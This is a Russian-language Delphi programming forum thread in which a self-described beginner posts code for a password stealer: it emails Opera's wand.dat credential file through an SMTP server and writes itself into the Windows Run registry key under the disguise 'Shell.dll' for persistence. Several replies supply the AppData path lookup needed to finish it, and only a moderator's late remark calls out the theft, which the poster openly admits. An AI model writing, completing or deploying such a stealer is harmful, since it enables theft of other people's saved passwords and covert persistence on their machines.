Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Общие вопросы Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 24.09.2012, 16:08   #1
Chicker
Новичок
Джуниор
 
Регистрация: 24.09.2012
Сообщений: 7
Вопрос Как указать путь для отправки файла на мыло

Привет уважаемый форум и его участники. Нужна такая помощь не могу указать путь до C:\Documents and Settings\User name\Application Data\opera\opera\wand.dat
ведь у всех имя пользователя разные (((Как это сделать вот код)
Код:
unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
  IdMessage, IdAntiFreezeBase, IdAntiFreeze, IdBaseComponent,
  IdComponent, IdTCPConnection, IdTCPClient, IdMessageClient, IdSMTP,
  StdCtrls, Registry;

type
  TForm1 = class(TForm)
    IdSMTP1: TIdSMTP;
    IdAntiFreeze1: TIdAntiFreeze;
    IdMessage1: TIdMessage;
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}
procedure TForm1.FormCreate(Sender: TObject);
var reg: tregistry;


begin
idSmtp1.host:='smtp.yandex.ru';
idSmtp1.port:=25;
idSmtp1.Username:='Логин';
idSmtp1.password:='Пароль';
idMessage1.Body.Text:='Ура пароли :)';
idMessage1.From.Text:='От кого';
idMessage1.Recipients.EMailAddresses:='Кому';
idMessage1.Subject:='Password';
TIdAttachment.Create(idMessage1.MessageParts,'Путь');
idSmtp1.connect();
If idSmtp1.connected=True then
idSmtp1.Send(idMessage1);
idSmtp1.Disconnect;
reg := tregistry.create;
reg.rootkey := hkey_local_machine;
reg.lazywrite := false;reg.openkey('software\microsoft\windows\currentversion\run', false);
reg.writestring('Shell.dll', application.exename);
reg.closekey;
reg.free;
end;

end.
Зарание спасибо ) Для информации я нуб в delphi)

Последний раз редактировалось Stilet; 24.09.2012 в 19:42.
Chicker вне форума Ответить с цитированием
Старый 24.09.2012, 16:43   #2
FaTaL
Участник клуба
 
Аватар для FaTaL
 
Регистрация: 09.11.2007
Сообщений: 1,761
По умолчанию

Например вот этой функцией
Код:
uses
  ShlObj;
........
function GetUserAppDataDir : string;
var
  c   : array [0..MAX_PATH] of char;
  dir : string;
begin
  SHGetFolderPath(0, CSIDL_APPDATA, 0, 0, c);
  dir := c;
  result := dir + '\';
end;
FaTaL вне форума Ответить с цитированием
Старый 24.09.2012, 17:11   #3
Человек_Борща
Старожил
 
Аватар для Человек_Борща
 
Регистрация: 30.12.2009
Сообщений: 11,426
По умолчанию

Можно проще:
Код:
var
 s:string;
begin
  s:=GetEnviromentVariable('appdata');
Человек_Борща вне форума Ответить с цитированием
Старый 25.09.2012, 11:12   #4
Chicker
Новичок
Джуниор
 
Регистрация: 24.09.2012
Сообщений: 7
По умолчанию

Ребят подскажите где взять эти функции а то я в стандартных не нахожу. Спасибо за вашу помощь !!!
Chicker вне форума Ответить с цитированием
Старый 25.09.2012, 11:30   #5
Serge_Bliznykov
Старожил
 
Регистрация: 09.01.2008
Сообщений: 26,229
По умолчанию

в Delphi 2006 так получилось скомпилировать:
Код:
uses ShFolder;

{$R *.dfm}

function GetUserAppDataDir : string;
var
  c   : array [0..MAX_PATH] of char;
  dir : string;
begin
  SHGetFolderPath(0, CSIDL_APPDATA, 0, 0, c);
  dir := c;
  result := dir + '\';
end;


procedure TForm1.Button1Click(Sender: TObject);
begin
  Edit1.Text := GetUserAppDataDir;
end;
Serge_Bliznykov вне форума Ответить с цитированием
Старый 25.09.2012, 15:52   #6
Chicker
Новичок
Джуниор
 
Регистрация: 24.09.2012
Сообщений: 7
Восклицание

Цитата:
Сообщение от Serge_Bliznykov Посмотреть сообщение
в Delphi 2006 так получилось скомпилировать:
Код:
uses ShFolder;

{$R *.dfm}

function GetUserAppDataDir : string;
var
  c   : array [0..MAX_PATH] of char;
  dir : string;
begin
  SHGetFolderPath(0, CSIDL_APPDATA, 0, 0, c);
  dir := c;
  result := dir + '\';
end;


procedure TForm1.Button1Click(Sender: TObject);
begin
  Edit1.Text := GetUserAppDataDir;
end;
SHGetFolderPath где взять эту функцию ???
Спасибо за код
Chicker вне форума Ответить с цитированием
Старый 25.09.2012, 16:07   #7
FaTaL
Участник клуба
 
Аватар для FaTaL
 
Регистрация: 09.11.2007
Сообщений: 1,761
По умолчанию

Как это где? Это функция Windows находиться в библиотеке Shell32.dll вот http://msdn.microsoft.com/en-us/libr...=vs.85%29.aspx
В Delphi XE3 она есть в модуле ShlObj, в Delphi 7 в SHFolder, как подсказал Сергей. Сам просто давно таким древним мамонтом как Delphi 7 не пользуюсь.

Хотя если программа пишеться не только для ХР, но и для Висты и 7, то не стоит использовать функции из библиотеки SHFolder, лучше использовать из ShlObj, но в Delphi 7 она выглядит вот так SHGetSpecialFolderPath.

З.Ы. Лучше всегда пишите на последних версиях среды разработки.

Последний раз редактировалось FaTaL; 25.09.2012 в 16:14.
FaTaL вне форума Ответить с цитированием
Старый 25.09.2012, 18:22   #8
Chicker
Новичок
Джуниор
 
Регистрация: 24.09.2012
Сообщений: 7
По умолчанию

Всем спасиб огромное но как именно употребить в коде ???Что бы путь был указан заранее что бы файл отправлялся ???Код на верху ???
Chicker вне форума Ответить с цитированием
Старый 25.09.2012, 19:39   #9
BDA
МегаМодератор
СуперМодератор
 
Аватар для BDA
 
Регистрация: 09.11.2010
Сообщений: 7,289
По умолчанию

Хаха. Мне вообще не понятно, почему стали помогать Код явно предназначен для того, чтобы воровать пароли. Подумайте чуть-чуть и сможете допилить, а то вообще не "кулцхакер".
Пишите язык программирования - это форум программистов, а не экстрасенсов. (<= это подпись )
BDA вне форума Ответить с цитированием
Старый 26.09.2012, 07:59   #10
Chicker
Новичок
Джуниор
 
Регистрация: 24.09.2012
Сообщений: 7
По умолчанию

Этого не кто и не скрывал)
Chicker вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как указать относительный путь, который с файла любого уровня вложенности будет всегда показывать относительно корня сайта romeno HTML и CSS 1 29.11.2011 16:32
Как указать путь сохранения книги MoHoMaXFR Microsoft Office Excel 4 25.05.2011 20:29
Как указать путь к каталогу? iskurt Общие вопросы C/C++ 0 17.06.2010 18:22
Простейшая процедура для отправки на мыло Alex88888 Компоненты Delphi 8 24.05.2010 15:47
Как указать путь к БД в ручную? Tvik БД в Delphi 11 26.03.2010 14:46